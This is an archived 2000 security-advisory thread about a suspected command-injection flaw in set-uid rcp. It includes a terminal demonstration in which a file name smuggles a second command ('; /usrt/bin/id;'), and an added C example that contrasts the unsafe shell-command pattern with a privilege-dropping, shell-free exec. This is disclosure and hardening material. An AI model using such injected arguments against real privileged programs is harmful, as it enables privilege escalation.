Re: possible bug in rcp...

2000-11-24T00:00:00
ID SECURITYVULNS:DOC:972
Type securityvulns
Reporter Securityvulns
Modified 2000-11-24T00:00:00

Description

On Wed, Nov 22, 2000 at 09:11:20AM +1100, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I
> haven't had much time to play with this, because exams are coming up.
>
> It is negated because system() calls /bin/cp which with the newer
> versions of bash, it drops its effective credentials...
>
> $ ls -alF which rcp
> -rwsr-xr-x 1 root root 14492 Jul 21 22:43
> /usr/sbin/rcp
>
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun
> stuff. This could probably be exploited, on older bash versions?
>
> It's up to you guys/girls now, I should start to study...
>
> Andrew Griffiths

just a wee exploit to help the boys and girls along innit

tlabs
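
The bug class discussed in this thread, shown next to a hardened form. This is an added example, not part of either post and not rcp's source: the function names and the `/tmp/rcp-demo-copy` destination are hypothetical, and the use of `/bin/cp` follows the original poster's description.

```c
/* Added illustration; not rcp's source. All function names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if the name holds a character /bin/sh treats specially. */
int has_shell_meta(const char *name)
{
    return name[strcspn(name, ";`|&$<>(){}[]*?!~#'\"\\ \t\n")] != '\0';
}

/* The pattern the post suspects: the file name is pasted into a command
 * line meant for /bin/sh, so ';' and '`' survive into it. This only
 * builds the string; it is never passed to system(). */
int build_shell_cmd(char *out, size_t n, const char *src, const char *dst)
{
    return snprintf(out, n, "/bin/cp %s %s", src, dst);
}

/* Hardened form: drop set-uid/set-gid privilege, then exec cp directly with
 * each name as a single argv entry, so no shell parses the names ("--" ends
 * option parsing). Returns cp's exit status, or -1 on failure. */
int copy_noshell(const char *src, const char *dst)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);             /* refuse to run with extra privilege */
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        execv("/bin/cp", argv);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *name = "bob bobalina; /usrt/bin/id;"; /* name from the post */
    printf("meta=%d status=%d\n", has_shell_meta(name),
           copy_noshell(name, "/tmp/rcp-demo-copy")); /* constructed path */
    return 0;
}
```

With the exec form, the name from the post is treated as one nonexistent file and cp exits nonzero; nothing after the `;` is interpreted as a command.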